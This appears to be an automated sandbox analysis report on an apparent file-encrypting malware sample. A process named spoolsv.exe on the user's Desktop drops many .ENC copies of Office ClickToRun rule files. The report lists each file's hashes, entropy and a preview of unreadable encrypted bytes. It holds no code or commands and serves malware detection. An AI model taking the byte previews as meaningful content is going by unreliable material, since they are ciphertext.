                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..M..r..[....*....Ai.K.ZQ.3xP.2-..".3!.`........LO.(V.{._.+."..........>C....^?..R0.Y@...f...!.......a .+..S......}:.iz.V.Z..T.....g..Z.........\ ..e.D...!.o.{e|....o..a.x[.....E}~.CD..|XHx...B.W....I$>8..N...\Vb.r...5e.S.o6.v....pk..o..G.>./.H...33..rs.s%...Vu...G.t.X.V6.#.cP.u..58I}.hw...,.......Nh.......CF.!..........b...\...K.yK..+WM.&.!)......>....q.*....;..Gy.`f_....<..&.. D,....!>...;.,N..8p+XK!.. .$..N[.......f.[.....CG0..........Y...*...I..jK...t.L.K....1.M..H.......A..@..J.......JVY...z..D....u2>w1..)...4.r....3hu'..G..X....a....k.m.g..>?..w.R{.i.W..M|.a....D..+R.\2`.&..!:..5.........].c...Z?.w.BA+..q..W..........!.^RuC.`......F....H).).....A`.+....#I.J...I!.l+.{_...F..e.|...G..3......6..b.[..,....g.....<.>>...R.ak.C...$y-....K......r.S..I.q7....B.P.}......%!..E?.e/.;.u..b..m.I.`.]...x...2.>.n.....j.fK..J.7_..Y..a.x...XG..D..K..+rWq.n<oCM#.E.^.f...m..X...\.(.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10781v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):480
                                                                                                                                                                                                                                                      Entropy (8bit):7.52058215914238
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7F3ghDlUWoce/9xpUlwckmSG0nZANygowH2E:++x3g1ltK9xpUlnGZ15Ah
                                                                                                                                                                                                                                                      MD5:152215A1084453C7792DFDDBBABCCFBC
                                                                                                                                                                                                                                                      SHA1:0A17285236F44E1E2D7210329DDE1FF2F7506CB2
                                                                                                                                                                                                                                                      SHA-256:1C18589665157ACD1BFA1EF503EDA82F370CDEBFF6A92A9B36AF71F9042E7EBA
                                                                                                                                                                                                                                                      SHA-512:B0BE19C2439E3F6C51215C27E1E5A893E78B7960DC663B6E0D1626F240150BCDEEB1A5D5D146F6251960CFE4EF61706EB70F4EA5A2E6E25481CCB6AEE6F567FD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fb.G.......8....l...].<v.tho..U.'......)...SM.....rU...L.e.#....).'R^W..].W..'.9.7.6%.....k.Y.oq....n....X.._....m...._1|...B>6*lu.9j.v... .A._B.....y`..t@.....R...Q.n...M...>..v.+d"..K..M"..U.s...Xj.C.6%lA...%........L..a\jvx..\.....".=....t......2-.b\.*..a....#B.m.M.5b..X>.a..h.Y3V.........xh..zY........Zh..+.....%..:....=..ToO..1.....$....5.aV..1f+GG...o..~.....V/.L.)..d...._.....G..2..)v.z6;.. .c..a+...[...5.\Re.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10784v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1744
                                                                                                                                                                                                                                                      Entropy (8bit):7.884814590285279
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++qgZoaOUCcVleZJK4P79BoiEIdAuPph9GIq2gQl7XSF4JeX:++rZoaXr0ZJbfv7BhAEggXBs
                                                                                                                                                                                                                                                      MD5:FA1C3CD126B6F40FFA9ED03EFE2CE0E0
                                                                                                                                                                                                                                                      SHA1:A84E29965E8DA94EB98E28EC4D10C7A5288BFF1D
                                                                                                                                                                                                                                                      SHA-256:2800CC416AE628E01BD560EB223EFB4AA2A3C53127F73E9BE9F72D8388422CE2
                                                                                                                                                                                                                                                      SHA-512:D94C3867ED41168DEF393F53CC45DBDE49AF0CF5CB6671477810E7BC8206A327A0EF3E62DA6F14FF1B9DAA8091042B735A38DB292B51BB9C6282F17B26E0424D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fy...2.......GZ....v...2.,ET3.IT....gYS.F$..Cz........$.....=...*K..Y......_0h.M... .^s..CS.B.)...?x8..R]..=..[..R......G.{.......c.P.Jz>.y..7]..`.....am.H...Z.`...X....d..9...x..Y.a.R~.Rc:..sa..Q..vo. .=..^.;d}.......[.F.....\..7.7...v.......K.@.T....g....e*.x9.W6jNLoG..X......M.Ie.. .I...,wVK;L4....=(.hZ.'./M.....`..h.....^....Ec.;....A.....L./.4..ML.........@.S...T.......Ln.h".D...+.*.......wD...E.7..V.x..y.X....).(v..@...|.U.~..d...R...}......tP^D..Xl..K.c.m:....!.h..A.-..=d*L......R}...:Z...#..+..Z..l..WR`.a....O......_.^.'m...h..Q........=..e......GxP[C0M7..&......N.5..,^.N)...0.!..]......Nd.h.Z...Qy.M..^......!K+.K...phU.....Y.i...[.NV....\."J._N...;#.z.l.0lkL...op'.+Q...........QE....D8...;6.a..!.b..w.db".>l+.....6'..8.+....P.m'X.$........N.XAS...Q..Z....:..v.jp..a.M...k.2.#..x....M.2|.k..,T.-0.....&..S.&..:9G..g....u. ...&v.#.'.3..WcJ..J_.*..V.......O.....Np..[u....H..m.b..(

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10800v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):464
                                                                                                                                                                                                                                                      Entropy (8bit):7.4935372348228775
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:fmcorOJ76SlJs5cfrJ7L0WF+DiVmaZwF+pxbifRrNyXM/xvVXOvFCepoYZ/ZDMh5:fmZaJ7zJzn3U+VF6kYftI25VXqFfRov
                                                                                                                                                                                                                                                      MD5:7A76DC89B8DE73B10BA8C233823A0CF1
                                                                                                                                                                                                                                                      SHA1:68DAC55EA4DCB5473C80F8C569A8ACD8D0E599DD
                                                                                                                                                                                                                                                      SHA-256:1C03BEBA845D067BCCC034EEB5E40259148C77A9E3949D3FAA06488A2D93E3E2
                                                                                                                                                                                                                                                      SHA-512:C0846A72B49AE9741B6E836E5A8F34C60E101ABCC6895FFF1B8743053DC2033757DAD7F92D0ACB96206DB3BC19C2E607B22588ED91F90C4BE22644CCEAB74448
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fmm....;...f.R.7....B...[...e.P.b..E.t.~.=..d....{......<h(..e...X.#Z.C`..0j.....;H...<.e.......t.....m#...o~..?q..DFD `.`...P.M.V.2..a.G0v.....\!$...M....c..[...XG.i..F,X..w..dF..$....f....RA...q........c.1zJ.....].<.{bI[....u..0!.9.bO..=i...lp. der....C...Y.v..mAQ.$.d..R..j.#h........A(IP....}..94p....0...;Pu.yw.R..Q...d...ZQ.7.#................[%<^...I...PAN.4l...2..'q....A`}..(#[..G...<.Ts.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10801v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2688
                                                                                                                                                                                                                                                      Entropy (8bit):7.935503285690613
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++SZER2zUGSwkspUIvGCdXxUx5mUB0pObw4H4n9jyKJ4AOEqZWjO:++Si2z7LGCdXal0AFH4n9OKJeZV
                                                                                                                                                                                                                                                      MD5:54805C40CD14D909A2BB8684C851C52B
                                                                                                                                                                                                                                                      SHA1:9CC4255C3A4418536D0F88A07E6AFD17B3036371
                                                                                                                                                                                                                                                      SHA-256:956410EE3AFD3D6D5C645AF73E9F3646FD296804A701F4031A8F6C2C69C10DC9
                                                                                                                                                                                                                                                      SHA-512:71BFF1D999F8509D76F78B9287C4B4E1CF029E796DF61CFC68EF14E703BD4D77E36B707E99CE3440BF26AAECCA3047EDBF87D303B4E47D0D2084B77134031444
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f...m..M....D.N...NL..MI...>..Ap..,..n.n..."...).........v........{.m...=..P.!........>......`.H..!..!.3.....o|.<.Q.k>Qv....o...P..L.q=*j+...Up..:..Y....$*...n./...uY."\...L.@..V,......<.....r..E..v...|...U....qL.}T8j;v.&.....X.....-..S./..f..........r|..f...z.g...D/.%..$.......L...../v.....iFb...a._.J&5+.L.5T...d.i...}I..c...t.1.pT~.o....0$......./.&.....$.OR".u>..][..H..w............Lz)).j..%.Y.hp.-..<..q.1....Q?..UyC.)e%s.....%rT.&pL1.D.o.....'....7Ys.u...H7..Q&..]...bD.Y.,.Q..'.aEi..Xj=............]!d^uk.7..9Ti@.,-.G.q..V..s.L.kf...oI'.0Z..^~....a..{..q......;U=D.a..[.Q.{).8......".oR..Z]@............#(^.....|. ..Q. ......F....-.p.b.../g.}Z.j..EW.*...1....F.@.T..n...tk)^.N..J.=.7.R&..8.,.........z*.*..O.2."...oW......8....s.Ki.q..]....R.I.j.y...+BDQ.X...Ap.6:..\..5.4..=H..Z..K...E\;L.[/.7..57....V$d?%..)0$E]^-.v.Lk6.!p8....g..dc.^.s|.+..'..R.....<....X+\.r.~V....6.Tp..j..3..,.)..].XwaX_.8.&k

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10802v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2688
                                                                                                                                                                                                                                                      Entropy (8bit):7.92623005902326
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++8gYnBUu4lc1ptI5YV4XTRGb14S9R/PXxkbf4UNOU5tL7RpvH9TyiXcL74c9K:++zgH4lcvt0BjRGb140RHXqbf4vA5pP9
                                                                                                                                                                                                                                                      MD5:DDDDF9443985D0EA120D292EFD202CD8
                                                                                                                                                                                                                                                      SHA1:5A01A961FD3250A73BA453613F5E35C933262D7D
                                                                                                                                                                                                                                                      SHA-256:96CA5BC5BA6CF264F183F1387F82A9E04FBF3DC17FC49B2EB3206963E72024A6
                                                                                                                                                                                                                                                      SHA-512:F0417F2119C87B06EF1C1CA927F92F3C1978A1ADCD910A253D39309D8223A13FE206A691461F5867901A3C770CFB4C091E359391529870300BD9F19E34B8110F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.Q.L.NvcZ....c.8f.....7.8.Uf.......@;..5.......E..K..m,T4..s...a=.T.3.H?.;4......*....n.J*.+.....H.n..:|...`....1.K.m.[......G.j..=.]..M....._.Q....yy.uzt.......U..4......\_c...UE..[Y.^...."..!.. ..Z.*.>.X0.6..*tSK....v..:8. o...S....t..|..J'..nD3h....yf.4....j..........p2..$.K..N.T.g..$pg.D!.Al...8...#!{X..L..7.K.....E.t....Q2.9..o..C.C....X..c..E...^....k.D_........T..s<.x.]..W\.".6.....V.x.5qb.y..q.7.8........v*...U...|..:..t..@.p&.R..#..X#.....'lB...q.G..6...!...Q..k./.$g]d....X..ta....8.....%..oO..... E.;........j=W<,o.O.#.......uo.Zb..r]jq.a..xBq.\..$a..'..I.....[.9|...+. ...)^....W.*....9..e..M..2..zo..j?+....{.W...C.z.}...2h.!eZ....6.2B..|j~....i.`g3.....?...7.t.#.../..k...$f;...-...;O.IO...A.kxc..E.+...oHh.x.g...}.i.......iY.k.wG...e..S..h.Z;<:w.D~-O*.[...ik.5I%q...Y.I...9..../.....>II....>......)9..o.Fm9..M'....x.g...y...c.f..#.W.-[...h.e..L.Q../F..&A{)..........l.x?.v

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10803v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4320
                                                                                                                                                                                                                                                      Entropy (8bit):7.960697123388303
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:++gru4WEitCVkfTGojoBsQw3p927gHCW9gXeFnqEhRg4:++P4TiEgoBsQw3ptgXeBRRg4
                                                                                                                                                                                                                                                      MD5:50BF0AA1AA11323E62A83859B643D5A9
                                                                                                                                                                                                                                                      SHA1:4C98D1895CA4329A8F634CC7E4646189D8D9DA3D
                                                                                                                                                                                                                                                      SHA-256:740E86D98321C0C1FB867A0CFAF2D1E182DFE64403E9C2DEF6DA83D42CEC0EBE
                                                                                                                                                                                                                                                      SHA-512:7633B7EA6A2B403FB59393A2BA94318851FDA2DAD3447D72692628A0CA6D267AAB158298C637B82D714855B3272EC098A4FD247295AE27EA127DE03550AFE41E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..+3uXc$.....f.7<!...B..._..|..i....x7....2..4...gZ..>"..Ud.._...n..L...2h...c.U|.}..t..-1.....AB......W..z.[vK...}t..{.S8.\._b...]...,G....F..$......u...&$.....C.oc....U'.md]K..l..C.a.V.$'........4...|?p.).X.t.q..r...e._s.L.,".Q;...5..P.s.^\.\5h)S@.;.{2k..IM....c.?~1..V7..A......LK.g...Y....L3..X...Q..y..0.{.s......:.,..^.t...P..T........h2..jp.`/R>....u.[...x...f..Ky...nnH......C..t.m8...b..Z~..N.KJF.._!..h!fS..].}p.'..B...3.|<P.i<j..W..8...K...T~.J.E..B.yB.e..l}..!2..f.`WM.,.......8.-}JU.J.sQ..u\...k....i........,{..-.&.J.........m.P..7...'.....P...<...1@.<...J..u{d...B. (...$..B.I$.....v....}...<M.\}.o.zD.x.~.i*+..........*I..u..e.!.$ ;%....(j.O.K...Y.L..i...&d?.R..A..6.x..x.s.f...........Q7....Hp..Z.......'...hm".@.........W..,...3.\..*.9xM....HN..~..d.8..f..`.d,.uP..d.......I....,..v.IO......Xu*._.xD..Y.C.....y;.`.y...V....V.p.).*.Y.A..S,..s.....:9...<.h?|I3o.(a~.:.\..Y.>.k.!.w..rr.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10807v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1008
                                                                                                                                                                                                                                                      Entropy (8bit):7.773596268602155
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++g7z+BMH7ACx0S4lsul1gwyzocDfyOjxX3M3xOu:++gX+o7hyVDl1csI6OJ3MhOu
                                                                                                                                                                                                                                                      MD5:C5D2064027CCBDA6509B63955BEE8DFE
                                                                                                                                                                                                                                                      SHA1:4E13F644F9DD546D9A6665992C7032DC5B9EDA6F
                                                                                                                                                                                                                                                      SHA-256:4DA5A5FE743685A98A8528BFA4BBAAF25120344EEC5A683A365F8AA680003D97
                                                                                                                                                                                                                                                      SHA-512:119D994309E23A5D4D3C08BB44DEC74C494F233BA9EAF851D6100E170F3DC1B76A744740B3C59D240CC0FACD4CDBADA93298B18494D7AE2ED975149A50E3C650
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.a....~G]..:...V;/...."...`..k8..H]..U.......a.|F.E/e..*V%...Q..R(.].....)K..j.3..w.g.4.........e,af}..Hw. ..|...!.w-.........b"..b.U.T.\. 3....>@.&tH...HR../#...{NT..Xe-...l.......2..<j.u]3U8..Yy..(Z..Z.;a_2.....L,.J.:..S..u..P7q=6.t.NB..._L.....E.E|..p.#).......C....Gh..;l~...A:ee........H......!.O.DHeh.....K..}..BU...}...G....}.j.K..-....3.D..Ss.u......Oi.Sr..gy..N...r.5h...bI.@.i......H.Xf8d?L..c.bw.....i!...G........k./..P..D.c.tS`b~&...........F:.E.BI....V#ce}zEq......"*.q....y].@.e...b{:.f............dq...g.......*..E>.}.Jd..f.../.6.!)..V)Xd.J.8k...ie.3]..#,..c%..........u.P?.#a.?.}Uia)DIYX.k.........mT.z ,v..of/.;j....S.......n&...}..Vy`O..>.X../y..Zu...........).x..:YH...sN......./lI4....u....1.c.V.h......yL.h....*B/.|..>?...l.....'.B._!....OK...!F...~..O.%w\iz.Q.6.1!%n.%.J...h*;..E.'1.*..v.W]O.59..Q-..yCnj...q..D.5lm.C..J.ig...^S..^....p.....V.`...m;.#@u....eN..\.8...../Ce...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10808v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1072
                                                                                                                                                                                                                                                      Entropy (8bit):7.816309481656905
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++lL5SBTMwQiGv35FybobcdD5D12HS0F1ZbOGDtaHdyFAP:++lLMBTmJ2oQHD12d1ZhuyCP
                                                                                                                                                                                                                                                      MD5:EFBD4B776F360FC99D15386E3245FD1A
                                                                                                                                                                                                                                                      SHA1:09C1AD0347AD0AC7520069AA7CF87A91B2420F03
                                                                                                                                                                                                                                                      SHA-256:BE98B20237B8C78D9F90C25A8CADF3E37795BCD908A7F459FF71A8B29ED40F62
                                                                                                                                                                                                                                                      SHA-512:9B1576BF6C8248CE538CD1BA82F601238CF4E427B7726861F7240D64E1ED3B05B09986972D6273F15906AF1848EFE9D56AD6FFE95D88A97105DC2DA3BF472E11
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..F...`..X..W7'..H.J...w...%..$....!.hc.|....Bp1ju|..%..t.q\3..Y.}.x.P.EL...(o....{..TgS..@.....uS_..)&9..kH...5...:....hQ..w.R_.d.{;_.7.'`]./_..%....0y.i.b........M..{......7....M.A~/.5g..z.........{...;......A.v0Z..yVq0.(A/..R.&...S....SX.....l].....Az0Pn.d.V^.~..s....g.E_m......Me'....r.04.S...P.>..;.nUf.....2...q8..?.....a..2.....f...C8..Y..2.9..m`G.SNZ....a4...........C...kH%.A...f?.....}....&.<...6.iV...\....|.t.Ms6n.i._...c%....)J....c..........q.(.n..(.G....|..W...KB..(.8h<.3L......9..!...[p2...M..x....M.....J^.....Y.B]q.6.)...i[...}d....K{..}\9m.;....HhB..q...o.......5.............+..*.X..yg.|.x....C........R.Q.....[2.."...lT..m...!e...n...&..YTs..z`.iE....Ygy..0....}........aw..%xqN"N.GWh.>h...u....S;..+?.&.t_-..G.[.....Q....K.+.9E7.R..X.....R.d~.<F..2....ZC~..r-yH~.ecq$.I4.C...{T.g..&.._.w%0.:..$......'...B..0....6.t...@NV.W.#T).~..~.c.V...\...I.C?.<b..@z...8.N../!.+)$.&.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10818v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):800
                                                                                                                                                                                                                                                      Entropy (8bit):7.766407928727652
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++nHfgKWfKLYZ3A68l7kST7cbnQJkH0HnW:++n/JWfkYZywSmI8EW
                                                                                                                                                                                                                                                      MD5:706CA883C6C976AEB97331F29AF99532
                                                                                                                                                                                                                                                      SHA1:2C01BC47BEA9CB3B28636E67F550143A685BB205
                                                                                                                                                                                                                                                      SHA-256:87D77FDECB8BA2BDB3D4236CFADD9022B0CFC57DE404DC0C72AAE69DA866864D
                                                                                                                                                                                                                                                      SHA-512:C605ACB119BCC5A2A0FFE648B876EAF77615DA882D69BEDCA29D925F4FB3164921C80109380C312D2EB8B04FD3C14C05BF410CE8E5477ECEA5376419DA6FB141
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fYJ...B..%........k...#+._-h....U.6.}..T..>.*....T.b...E8..Yv.;....4G...Q.@F.....Q1.1......H..).rK....d.....h|P..)..mf!.....G....X.-<...". .T.q....{..F..i.Q0.......a..vu.8.......~ow.......n.S!.:.......lo....n.\l..K.6*..s._....J......g..A.0.UJn."..MP.=\.C.....n.x.L..U......N-.q....|.W...lGh+ Iq^.E.(.........`O*.Z...y.....6.<.jR.s5....5w.s<.|_.F..a.[......t.4.)...N^/...q.Z...}.&.&.*i.....|Z.EEmr.:d...k.9..]....0...T.l{..v...v..v....O.qM.s.v...X.i.Y=x.#..1~..%K7$^....V..>.v.].\j3...1t:Z...Rd..8e.S.,\.K...q5V.....d..%.v^..!.C.qMo|..0.T...].I....o......w.kP....7...i....>..&';.C....LK.u...*.......=.....:f..v$.?...l...V"Rkk.(...{L.....).*..N.n.fq...'...H....\D./..l.. .kQ}F H.o$2.|YE.U.....Z..g....>..V......hA.S<_.&".h.._:[.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10819v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8448
                                                                                                                                                                                                                                                      Entropy (8bit):7.976573289710178
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:++D+1uKLjBIhDGl/HrGCI2eg0Y8So1wqfa/4v:/+1jfBmGlDo2eg0Ylo1wE
                                                                                                                                                                                                                                                      MD5:B3EF8C387566A50CD41A83B73383E4BD
                                                                                                                                                                                                                                                      SHA1:F833BF2756E7EC2DB43052CB43D2823CFC7F53E0
                                                                                                                                                                                                                                                      SHA-256:27CBDA6165C3811E35240995E636D938043E11FA53DB257ECC8DD759B59CD3A5
                                                                                                                                                                                                                                                      SHA-512:51B3F3DB7B5F419FD9B0B4C6D829FD88224A9A7319E7FDAD92CB56EC592C2BB0670151E9D96E8D7A870DC2A514E9FB60FA2A83087CC7BD95E18CECB9F213B3A4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fD.......KKnCF._J_.X..@./!.X.E...C...N............]....I.}..:.&..S..l..5.<.Y....T..qg... ......@...S?.....1.os7.!A...d.Y1..U..).1.8`....W.vN[x|....H....p!...g...}(wd..k..-L.Y.u;.w.Y..h...b>.*.DW..j..0pts.@.Ox..."84.].....?....0......'@>..v..qn=&?-...."elVO,h...e.[.A..6....^.4.{2.lKV..^.ih.~....".!.@B.4C.f=..e..D.=?P;..{V.0...Sh|.`.R.$.omi%.9.Xo@...Z;OJ.5].....)..U.e\i%.:......a. *.....U&.i............7..F...S..N....I4v.9`........(....:..]...:%.r ....}...:.].i.|.............. ...'.^jp..&_3._.A.|.C.t.i.hNI.z.......Q.!......^8..=)P....Y...*..Q..d.PG5h>....J\..Q...OCW$..x.......B..N.B.`....-..T.M.3s.....l..I-...p.Z...fv...........)?.o".v.)Cu@....v:+.2r........J_..a.....'4.....j.%_)..%.T.]+.t.*5........./.............fS..t.}N..AL.i.....T$ b.`:.,.4i.MC3..%P"b..D.V.IF`..R...2....Ajb0z.'.;3..3....O.j......UFr_.T..Kx#.I ...............6;..Z..IB.....S........G..l...8:.).N].Z..&w?..tq..........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10820v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5520
                                                                                                                                                                                                                                                      Entropy (8bit):7.970279387073756
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:++Jmva5MFbU9xuProSZsPHldt5P25BCqpU7K5jn/thspiGQTrbe09k2r0Mj6u:++4i5ebr8z35O5BCqOOVXsAGwrbe09kO
                                                                                                                                                                                                                                                      MD5:0D0F5B30F03B5CAC597BC602D955A3E7
                                                                                                                                                                                                                                                      SHA1:003E67A3A50CC3A5EA79D2467C78455E64373F13
                                                                                                                                                                                                                                                      SHA-256:5987FE14FE0677FBE26E33E256CC1B275CDDD0015B66BC8E3151FA0896696948
                                                                                                                                                                                                                                                      SHA-512:24E2CFAD5D447C7DCE6BA5B01310D4A3E9535B18A64C2F93535A8F55E1A605DDAEB86C2B1EF71E2847457A3274060526984FA59998C62B16F15E754B29F7D8D1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f8....a.|..45...M...8.y9U`.^]........62.G.=|...&..xeT........7ip=S...q.l.c.....I....w...\i... .z....'wA.PI.......$>=.....V9...N..'.@.M.+...g..l...r.^....|Z....M....,..V.x._h..d.z..v..jV...gR...[.1.!..{+*n.K.W..4({L.....QU.)...^``z.\.0..+...~.J..IN.....).q.x....&*..B.{...!.=d,.0..G...P.Z0v.p...4.1n.53.gM...Z...T...Tp'.X.ggc....m.cw.*..a..}....6....$yH..{..0.tX.^.....\W._...c..Rf.AQ..g...C.n..b...p...jZ.@.u...9."........J...wk...;.<.e.GF{/.T%.zl5uc.....'2......Nu...........0l.b.F.n..."..V.cJ........q2.s.6.%^W..o..._5.)k...F..}#...g...f.1E@..^Gd=w??`..X..p.p.......o.X.K.I3.]+.}.r...6.NW.c..+.)....I....7QF..l.3....4.Q..."&..b.UR...[..h...A`Q_..!1,..K..z....:.......I.7Tv..h..X~._.p.....Cp1)..g...I...&..Hh..@vd"...]..<pKs....4..#..!..O.=......A..5.LT5.<...r.P.(U.?...M}.y&....aL.9.=.?...ne.L.?kn......x..h....%...RA..M:d.ZP0..<..&p.@s..u)<.w...>.........\".&....mN.!....'.l..t,...L.S.d .a...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10821v3.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4464
                                                                                                                                                                                                                                                      Entropy (8bit):7.959048718328478
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:+++BmouipKDwwi4mFajyjJSec5eiuwH8k4i6YNKcPOrPMPcxJ:++UmNips9i4mFajuJGezwH8kPIaoPMPi
                                                                                                                                                                                                                                                      MD5:622822F7284A3A300E826882ECE36793
                                                                                                                                                                                                                                                      SHA1:0EE8714E7B55E0B2B4C17FF19678980A7D88FCB7
                                                                                                                                                                                                                                                      SHA-256:D7C8E3E7D5DF74C6AD8AB6B248934E03E0B6FF82073A8F155AB83F0E5A94205E
                                                                                                                                                                                                                                                      SHA-512:3FA87B01A60C2006E44DCD5BBB5F17661C9FED011391D62A345C28BA51F4FB882C6892743E81CBCB1C0CEA2FA18DD20F9612372D811EA8BF38595AB45281EFF8
                                                                                                                                                                                                                                                      Malicious:false
